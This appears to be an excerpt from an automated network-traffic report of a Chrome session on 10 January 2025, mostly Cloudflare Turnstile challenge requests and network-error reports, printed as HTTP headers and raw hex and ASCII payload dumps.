                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC3160OUTData Raw: 76 5f 38 66 66 63 62 36 61 62 64 61 62 33 37 64 30 36 3d 68 32 47 73 34 73 35 73 6e 73 54 73 46 52 30 55 52 30 7a 73 52 66 51 71 38 6f 66 30 25 32 62 52 61 61 30 33 76 30 51 5a 73 52 62 30 6d 73 51 47 6f 51 24 62 47 30 44 59 62 30 41 6a 52 4f 68 30 72 73 52 7a 47 30 51 4d 49 32 79 4a 30 4d 71 30 45 30 52 32 30 4d 47 31 5a 30 76 30 79 5a 51 61 30 71 5a 59 47 77 30 63 73 79 6f 44 30 4b 44 59 46 2d 65 73 6d 58 58 6b 30 4d 4b 49 30 2b 73 59 63 45 6b 2d 38 44 37 44 46 74 66 7a 43 67 38 53 30 61 5a 30 64 35 73 79 41 31 49 72 44 2b 73 79 54 75 30 79 68 30 59 69 55 58 38 68 42 58 73 30 37 38 55 75 32 38 49 75 35 68 45 63 71 42 66 79 74 55 52 6f 5a 48 5a 66 49 59 38 49 30 56 5a 30 7a 47 6e 6c 2d 43 52 56 30 63 6f 41 78 68 56 47 30 63 63 6e 41 43 64 66 30 75 53 6a
                                                                                                                                                                                                                                            Data Ascii: v_8ffcb6abdab37d06=h2Gs4s5snsTsFR0UR0zsRfQq8of0%2bRaa03v0QZsRb0msQGoQ$bG0DYb0AjROh0rsRzG0QMI2yJ0Mq0E0R20MG1Z0v0yZQa0qZYGw0csyoD0KDYF-esmXXk0MKI0+sYcEk-8D7DFtfzCg8S0aZ0d5syA1IrD+syTu0yh0YiUX8hBXs078Uu28Iu5hEcqBfytURoZHZfIY8I0VZ0zGnl-CRV0coAxhVG0ccnACdf0uSj
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 155788
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cf-chl-gen: We6BNrTTmTxgVaDnQlTwehupaETrWrBydXzCgDtiY2qHYb+7fej+mv/Box1HFzkeyZNHKYSWZ5ZQvsJleHpFdfCtINhDtjEHlP2ZDDacVGplkUaamgT4pdHVrrBSCHt8vtREVoyv2CN/MelfzOx0IexOLbVcvaAtI8RltkvyPNYRHXkMfEC5ls4sbv8DHsxkNacfCFF/PMp1gx67IkebgLn/ugmFsZ8l4ode3RHsfbCccD/z2sQfm3qVz8p6IWW49MZDUuZiSBTEDdvfLohvoSbK66h3G5302T8aM21GyGuMpv7T4MA7ZN4ExNtcocf7/weRqSwncjtv3xf/W0jKb2ZIp+HSgsPrY1NlpT40WS57AGj/5j92R8qBMQ8NsPVzd5KtrDKYrAIAOgaH2LW2ZXAJ9bOzna+NoWE48Oma2fRRi4XEjGUUrLOWFI2pXh6Qcs1UMSZl/F4njTBI6AFZi3nGID7ZCeFE7ntzilXj/aXlTN4mG8es69Q/n4t5OS+R00pBWHRbP37uXyDHKj63FQ==$29kjMyRt2hMq7QpPUHRZlA==
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6b658cb4313-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC574INData Raw: 64 6f 53 59 73 71 79 35 73 59 4b 2f 67 59 32 43 75 61 65 63 77 4a 33 4e 71 63 36 6c 6d 36 58 4c 7a 4b 36 6d 6f 4a 43 54 74 70 62 4d 6c 70 33 47 72 72 36 33 72 4c 47 62 77 64 6d 33 32 4c 66 4b 70 63 72 48 75 4c 33 67 76 73 66 52 77 4e 44 68 32 4f 37 4a 34 39 44 75 37 2b 7a 61 39 2f 4c 74 35 4c 2f 56 35 65 62 56 78 64 58 70 32 4f 4c 75 37 4f 30 52 34 38 33 79 42 75 44 6b 38 2b 37 78 39 51 37 79 39 66 6a 73 36 53 54 37 33 43 55 48 34 51 63 6d 39 50 6e 34 43 75 59 44 49 69 51 77 4a 77 72 74 4d 53 59 6f 4c 52 49 55 38 77 38 73 47 50 63 4c 46 45 45 41 50 52 59 68 51 45 5a 49 49 54 63 46 44 77 5a 44 48 52 4d 30 53 79 51 67 54 69 34 72 4a 79 70 63 4a 6a 6f 76 55 42 6b 37 49 53 34 2b 52 44 4d 6b 49 32 5a 4c 52 69 31 64 58 56 31 43 53 79 35 51 61 6c 42 31 4e 44 4a
                                                                                                                                                                                                                                            Data Ascii: doSYsqy5sYK/gY2CuaecwJ3Nqc6lm6XLzK6moJCTtpbMlp3Grr63rLGbwdm32LfKpcrHuL3gvsfRwNDh2O7J49Du7+za9/Lt5L/V5ebVxdXp2OLu7O0R483yBuDk8+7x9Q7y9fjs6ST73CUH4Qcm9Pn4CuYDIiQwJwrtMSYoLRIU8w8sGPcLFEEAPRYhQEZIITcFDwZDHRM0SyQgTi4rJypcJjovUBk7IS4+RDMkI2ZLRi1dXV1CSy5QalB1NDJ
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 78 4d 4e 54 5a 68 4f 6a 74 78 59 55 41 74 5a 44 46 30 55 30 56 76 5a 32 64 36 62 58 35 58 58 56 4e 43 56 31 46 67 66 49 70 48 67 31 78 35 62 6f 79 4c 5a 49 70 4c 58 45 39 33 56 6f 4f 46 6b 47 74 34 65 46 56 34 64 59 43 53 59 32 39 2f 63 70 6d 6a 68 33 39 6a 59 36 53 6c 61 70 70 2b 68 34 61 50 6b 5a 4a 31 6a 61 57 57 6d 4a 4b 71 71 37 39 39 74 70 2b 42 74 70 65 56 67 63 44 43 78 34 57 47 78 73 43 33 79 71 66 44 30 4a 79 6b 7a 64 53 76 70 72 57 4e 79 4c 32 75 31 35 4c 42 73 61 33 4d 73 37 57 77 79 64 71 38 79 72 7a 4b 33 36 66 4d 37 2b 44 47 35 72 33 69 78 4f 62 74 36 63 72 30 31 74 58 32 34 62 72 5a 2f 50 4c 41 41 39 37 30 39 41 50 58 2b 75 6b 4a 43 50 77 43 34 2b 6b 41 7a 2b 73 5a 46 50 44 53 44 66 30 62 36 69 48 32 2b 4f 34 6b 49 2f 7a 79 4b 43 6f 42 39
                                                                                                                                                                                                                                            Data Ascii: xMNTZhOjtxYUAtZDF0U0VvZ2d6bX5XXVNCV1FgfIpHg1x5boyLZIpLXE93VoOFkGt4eFV4dYCSY29/cpmjh39jY6Slapp+h4aPkZJ1jaWWmJKqq799tp+BtpeVgcDCx4WGxsC3yqfD0JykzdSvprWNyL2u15LBsa3Ms7Wwydq8yrzK36fM7+DG5r3ixObt6cr01tX24brZ/PLAA9709APX+ukJCPwC4+kAz+sZFPDSDf0b6iH2+O4kI/zyKCoB9
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 2b 59 47 70 54 4c 32 4a 75 4d 6e 5a 6d 63 6a 63 77 61 6e 59 34 4e 47 35 36 50 48 35 43 52 32 41 38 59 32 31 63 52 47 43 4a 6b 57 52 78 6b 35 42 73 56 31 64 78 65 6f 75 4b 56 6f 64 75 59 47 70 32 62 47 4e 75 59 61 64 38 61 5a 2b 71 67 4b 6d 66 72 6f 53 75 73 37 4b 49 73 71 65 32 6a 4b 2b 6d 63 6f 68 30 76 59 6c 2f 6e 58 53 42 70 62 69 55 78 5a 43 43 6c 4b 4f 65 78 63 32 39 68 38 54 53 77 62 33 4d 6a 38 6a 41 6c 5a 50 4d 79 5a 6d 58 30 4c 75 64 6d 39 53 2b 6f 5a 2f 59 77 61 57 6a 33 4d 53 70 70 2b 44 50 78 39 2f 4e 70 74 48 50 72 37 54 4e 32 2f 76 31 39 39 2f 4a 30 76 76 6a 34 72 33 51 78 66 33 55 30 39 49 41 41 76 6f 50 2b 65 66 79 36 73 6b 46 41 75 67 55 45 42 44 75 45 51 62 64 39 51 6a 7a 44 68 30 63 42 75 34 53 41 4f 45 54 4b 43 58 69 34 7a 44 73 37 43
                                                                                                                                                                                                                                            Data Ascii: +YGpTL2JuMnZmcjcwanY4NG56PH5CR2A8Y21cRGCJkWRxk5BsV1dxeouKVoduYGp2bGNuYad8aZ+qgKmfroSus7KIsqe2jK+mcoh0vYl/nXSBpbiUxZCClKOexc29h8TSwb3Mj8jAlZPMyZmX0Ludm9S+oZ/YwaWj3MSpp+DPx9/NptHPr7TN2/v199/J0vvj4r3Qxf3U09IAAvoP+efy6skFAugUEBDuEQbd9QjzDh0cBu4SAOETKCXi4zDs7C
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 51 6d 56 59 4c 6e 46 39 65 57 46 72 62 7a 74 4e 67 31 57 46 55 6e 70 61 6a 45 52 36 57 6f 39 48 61 46 36 54 54 6d 78 69 6c 31 46 77 5a 70 74 5a 64 47 71 66 56 6e 68 75 6f 31 5a 38 63 71 65 58 5a 34 4b 47 68 33 6d 42 72 6f 74 76 72 61 65 51 6e 6e 36 42 63 4a 47 51 65 5a 4f 39 6a 4a 69 50 66 6f 2b 2b 75 61 32 62 77 4c 32 78 6e 34 48 42 74 61 4f 6c 6e 34 65 50 75 36 75 52 72 36 43 59 31 70 44 44 70 4d 6e 5a 76 4f 44 62 7a 4e 72 57 31 63 4b 7a 36 4f 44 68 76 4f 50 64 70 38 6a 6d 33 75 66 45 39 4f 79 30 77 4f 7a 42 74 64 6e 5a 32 65 62 66 2f 50 33 37 75 38 2f 2b 2f 75 58 55 33 66 50 6b 35 75 72 6d 2f 73 30 45 38 4e 2f 70 38 4e 48 34 42 65 38 4b 38 78 30 59 38 68 66 64 45 76 37 37 4a 52 34 49 33 39 38 53 2b 43 44 36 46 76 6a 68 4a 69 77 42 48 67 4d 6c 47 42 55
                                                                                                                                                                                                                                            Data Ascii: QmVYLnF9eWFrbztNg1WFUnpajER6Wo9HaF6TTmxil1FwZptZdGqfVnhuo1Z8cqeXZ4KGh3mBrotvraeQnn6BcJGQeZO9jJiPfo++ua2bwL2xn4HBtaOln4ePu6uRr6CY1pDDpMnZvODbzNrW1cKz6ODhvOPdp8jm3ufE9Oy0wOzBtdnZ2ebf/P37u8/+/uXU3fPk5urm/s0E8N/p8NH4Be8K8x0Y8hfdEv77JR4I398S+CD6FvjhJiwBHgMlGBU
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 31 78 71 53 6b 74 44 59 6c 32 41 63 55 4a 5a 5a 47 74 66 56 34 70 4d 54 6e 74 51 61 59 39 71 61 49 42 6a 59 6c 4a 38 61 49 6c 2f 6a 46 4f 56 66 32 43 54 64 58 71 68 67 49 57 4d 66 49 53 69 72 71 52 72 68 61 4f 52 6f 5a 61 41 75 48 64 7a 64 62 47 33 6a 62 6d 4b 73 4b 4f 75 6e 62 79 32 78 34 58 44 6c 61 69 69 6d 34 32 4f 6d 71 69 39 73 4b 6d 71 71 4e 65 68 73 37 43 6a 76 5a 7a 4c 6c 71 7a 66 73 65 47 36 31 72 62 6f 31 2b 4c 43 78 73 65 35 77 65 37 4c 72 2b 33 6e 30 4e 36 2b 77 4e 4c 4d 77 73 33 74 30 38 66 5a 75 76 6e 54 2f 66 6e 74 32 77 48 39 38 64 2f 42 41 76 58 6a 35 67 62 35 35 2b 59 4b 2f 65 76 6c 35 39 59 54 36 52 6f 58 38 4e 67 5a 47 75 41 51 4a 64 34 6b 35 66 6f 6f 48 41 4d 75 4b 53 6b 74 37 66 44 79 4e 54 48 2b 4c 53 37 31 44 76 41 74 4c 68 63 32
                                                                                                                                                                                                                                            Data Ascii: 1xqSktDYl2AcUJZZGtfV4pMTntQaY9qaIBjYlJ8aIl/jFOVf2CTdXqhgIWMfISirqRrhaORoZaAuHdzdbG3jbmKsKOunby2x4XDlaiim42Omqi9sKmqqNehs7CjvZzLlqzfseG61rbo1+LCxse5we7Lr+3n0N6+wNLMws3t08fZuvnT/fnt2wH98d/BAvXj5gb55+YK/evl59YT6RoX8NgZGuAQJd4k5fooHAMuKSkt7fDyNTH+LS71DvAtLhc2
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 46 59 57 45 68 32 69 57 78 4a 65 33 78 6b 6b 49 56 4f 55 57 4a 74 69 32 47 44 6c 6e 65 57 63 5a 35 65 6c 6e 31 39 6c 61 46 34 70 31 35 6d 66 35 4a 69 70 34 57 6d 67 5a 32 68 6b 36 4a 76 70 4a 61 46 69 61 64 32 72 35 79 57 6a 72 65 68 72 37 68 31 70 4c 53 6d 6e 5a 4b 69 6c 71 6d 72 77 6f 6e 44 6d 4d 48 45 70 62 37 44 6b 6f 6d 34 75 62 72 50 79 64 4b 5a 6d 4c 50 52 76 72 33 44 77 4c 61 67 74 74 57 36 70 39 62 4b 34 4b 76 62 7a 4f 6e 41 77 65 66 53 77 4f 50 59 78 2f 72 6d 33 4d 72 65 31 4d 72 73 2b 72 62 35 7a 77 54 6a 78 38 69 39 31 75 51 4d 44 74 2f 69 42 67 62 64 2f 76 37 54 44 68 54 70 46 75 63 4e 41 41 76 35 47 52 4d 6b 34 53 48 67 46 64 72 62 44 4f 55 6f 41 66 66 35 49 51 58 2b 37 51 6b 65 44 51 58 33 44 41 30 4c 39 78 59 78 50 6a 63 39 4e 76 6f 44 4d
                                                                                                                                                                                                                                            Data Ascii: FYWEh2iWxJe3xkkIVOUWJti2GDlneWcZ5eln19laF4p15mf5Jip4WmgZ2hk6JvpJaFiad2r5yWjrehr7h1pLSmnZKilqmrwonDmMHEpb7Dkom4ubrPydKZmLPRvr3DwLagttW6p9bK4KvbzOnAwefSwOPYx/rm3Mre1Mrs+rb5zwTjx8i91uQMDt/iBgbd/v7TDhTpFucNAAv5GRMk4SHgFdrbDOUoAff5IQX+7QkeDQX3DA0L9xYxPjc9NvoDM
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 67 58 48 68 59 6a 59 69 4b 55 49 70 51 61 70 57 44 56 46 69 56 63 56 70 37 63 6d 2b 44 6d 57 4b 4e 6b 4a 65 6f 66 47 69 42 58 71 57 75 6e 33 70 37 6f 61 65 63 69 36 71 73 69 4c 4f 71 62 62 75 36 74 72 6c 36 72 37 43 35 6b 72 6d 33 67 37 2f 49 6e 5a 76 4a 78 37 65 4d 79 61 61 4e 6a 71 61 65 7a 63 32 57 77 63 53 70 33 4b 2f 4e 30 4b 43 65 75 64 66 59 6e 37 75 5a 78 4b 58 42 36 62 58 45 79 50 44 4a 30 64 50 44 78 64 4f 75 36 73 6a 4c 78 39 6a 56 32 39 63 42 37 4d 76 4e 76 2b 58 5a 38 74 50 69 2b 51 54 38 39 77 37 6a 41 74 37 77 33 39 4c 77 39 75 30 57 34 66 44 31 38 76 58 39 37 2b 2f 78 41 4e 6f 58 39 50 66 7a 42 51 49 49 42 43 33 30 39 2f 6e 76 45 67 59 66 2b 77 38 6d 43 67 73 4b 38 43 62 35 48 6a 38 38 4c 79 41 30 46 41 38 30 46 6a 51 70 52 54 35 46 42 6b
                                                                                                                                                                                                                                            Data Ascii: gXHhYjYiKUIpQapWDVFiVcVp7cm+DmWKNkJeofGiBXqWun3p7oaeci6qsiLOqbbu6trl6r7C5krm3g7/InZvJx7eMyaaNjqaezc2WwcSp3K/N0KCeudfYn7uZxKXB6bXEyPDJ0dPDxdOu6sjLx9jV29cB7MvNv+XZ8tPi+QT89w7jAt7w39Lw9u0W4fD18vX97+/xANoX9PfzBQIIBC309/nvEgYf+w8mCgsK8Cb5Hj88LyA0FA80FjQpRT5FBk
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 61 46 56 51 6c 6d 79 55 69 35 70 77 6d 59 2b 65 64 4a 36 6a 6f 6e 69 69 6c 36 5a 38 6e 35 5a 69 65 47 53 74 65 57 2b 4e 5a 48 47 56 71 49 53 31 67 48 4b 45 6b 34 36 31 76 61 31 33 74 4d 4b 78 72 62 78 2f 75 4c 43 46 67 37 79 35 69 59 66 41 71 38 43 45 79 38 6e 4f 69 4c 4f 74 78 73 4f 57 6e 4a 32 6d 73 63 6a 68 7a 64 79 35 34 37 4f 66 35 39 79 2f 6f 2b 72 62 33 65 62 51 79 72 37 51 34 65 6a 6c 39 65 58 56 32 4f 6e 34 33 74 50 52 39 74 62 77 41 4d 37 2b 39 73 44 41 77 51 72 69 39 2f 67 51 35 74 34 4c 33 51 6f 4d 46 77 4c 53 46 78 41 55 35 39 6b 4b 44 66 55 65 34 64 72 6a 31 75 41 41 48 68 72 31 47 2b 66 2b 36 52 73 71 48 4f 76 73 37 43 30 74 4e 53 34 46 4b 54 73 45 47 6a 30 57 46 41 45 41 47 78 59 75 52 7a 38 31 47 55 41 6b 50 7a 73 37 4f 79 41 70 47 6a 77
                                                                                                                                                                                                                                            Data Ascii: aFVQlmyUi5pwmY+edJ6joniil6Z8n5ZieGSteW+NZHGVqIS1gHKEk461va13tMKxrbx/uLCFg7y5iYfAq8CEy8nOiLOtxsOWnJ2mscjhzdy547Of59y/o+rb3ebQyr7Q4ejl9eXV2On43tPR9tbwAM7+9sDAwQri9/gQ5t4L3QoMFwLSFxAU59kKDfUe4drj1uAAHhr1G+f+6RsqHOvs7C0tNS4FKTsEGj0WFAEAGxYuRz81GUAkPzs7OyApGjw
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC1369INData Raw: 6e 64 78 57 4a 4f 58 6a 35 35 33 67 56 79 45 70 47 42 67 6b 71 69 4a 67 34 32 72 71 6f 47 49 6f 32 36 6c 6a 4b 75 66 6f 71 35 35 73 61 35 7a 68 6f 74 2f 6c 70 57 36 6e 62 4b 43 6c 35 32 6e 67 72 36 63 6a 4c 32 4d 79 4d 36 6c 76 61 62 51 73 72 54 51 6f 62 43 73 79 73 2b 2b 72 5a 61 59 31 4c 50 52 73 65 57 33 30 4c 62 44 35 62 32 34 33 61 62 63 76 62 76 6e 7a 2b 6a 42 31 73 76 44 37 4d 62 73 33 63 2f 4e 79 66 37 43 31 4e 44 54 33 39 66 5a 31 65 50 39 34 74 7a 6e 79 75 6a 66 38 2b 6e 77 36 67 45 53 36 76 48 77 37 41 73 51 2f 75 33 57 32 42 55 56 4a 76 51 57 43 41 72 34 4b 52 33 36 42 76 76 75 41 2b 4d 54 44 54 58 77 41 69 62 30 45 43 77 59 50 52 51 62 50 6a 30 57 51 30 49 42 47 54 63 32 50 45 4d 6c 44 42 63 48 43 77 49 78 51 7a 4d 47 4a 46 63 66 54 54 56 47
                                                                                                                                                                                                                                            Data Ascii: ndxWJOXj553gVyEpGBgkqiJg42rqoGIo26ljKufoq55sa5zhot/lpW6nbKCl52ngr6cjL2MyM6lvabQsrTQobCsys++rZaY1LPRseW30LbD5b243abcvbvnz+jB1svD7Mbs3c/Nyf7C1NDT39fZ1eP94tznyujf8+nw6gES6vHw7AsQ/u3W2BUVJvQWCAr4KR36BvvuA+MTDTXwAib0ECwYPRQbPj0WQ0IBGTc2PEMlDBcHCwIxQzMGJFcfTTVG


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            128192.168.2.174984635.190.80.14435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC535OUTOPTIONS /report/v4?s=NTy5FmInOhUR88Lwrok3kwnPNKIH1pnWwJpPUp1Hwt3iZqhpMbqVtdAdlgfYyuBVugBTlSiEpQnm8tehb8Y6AgK8NKLJUbNdWCkk0rO%2FaR2A%2B6%2FJ63gdvNQpauEc8Q%3D%3D HTTP/1.1
                                                                                                                                                                                                                                            Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Origin: https://dm9h.zomivane.ru
                                                                                                                                                                                                                                            Access-Control-Request-Method: POST
                                                                                                                                                                                                                                            Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:37 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            access-control-max-age: 86400
                                                                                                                                                                                                                                            access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:37 GMT
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            129192.168.2.174984735.190.80.14435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:38 UTC476OUTPOST /report/v4?s=NTy5FmInOhUR88Lwrok3kwnPNKIH1pnWwJpPUp1Hwt3iZqhpMbqVtdAdlgfYyuBVugBTlSiEpQnm8tehb8Y6AgK8NKLJUbNdWCkk0rO%2FaR2A%2B6%2FJ63gdvNQpauEc8Q%3D%3D HTTP/1.1
                                                                                                                                                                                                                                            Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 429
                                                                                                                                                                                                                                            Content-Type: application/reports+json
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:38 UTC429OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 31 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6d 39 68 2e 7a 6f 6d 69 76 61 6e 65 2e 72 75 2f 6f 49 5a 6e 45 77 33 6e 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 39 36 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22
                                                                                                                                                                                                                                            Data Ascii: [{"age":0,"body":{"elapsed_time":417,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://dm9h.zomivane.ru/oIZnEw3n/","sampling_fraction":1.0,"server_ip":"104.21.96.1","status_code":404,"type":"http.error"},"type":"network-error"
                                                                                                                                                                                                                                            2025-01-10 12:36:38 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:38 GMT
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            130192.168.2.1749848104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:38 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/688879100:1736511142:tGsU17yq18PkVnI4wKa3Ww51WTbxFUU1SF8xW7QVDR4/8ffcb6abdab37d06/ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:38 UTC375INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:38 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 7
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                            cf-chl-out: kkn30H+zMfoTfkPEUTJi2w==$Rp+rfy+e49VAq1MCZvQxEg==
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6bc788c4285-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:38 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                            Data Ascii: invalid


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            131192.168.2.1749849104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:39 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8ffcb6abdab37d06/1736512597511/3H40ckXZIbhbHk8 HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:39 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:39 GMT
                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                            Content-Length: 61
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6c05faa4384-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:39 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 59 00 00 00 60 08 02 00 00 00 f9 1c 49 9d 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                            Data Ascii: PNGIHDRY`IIDAT$IENDB`


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            132192.168.2.1749850104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
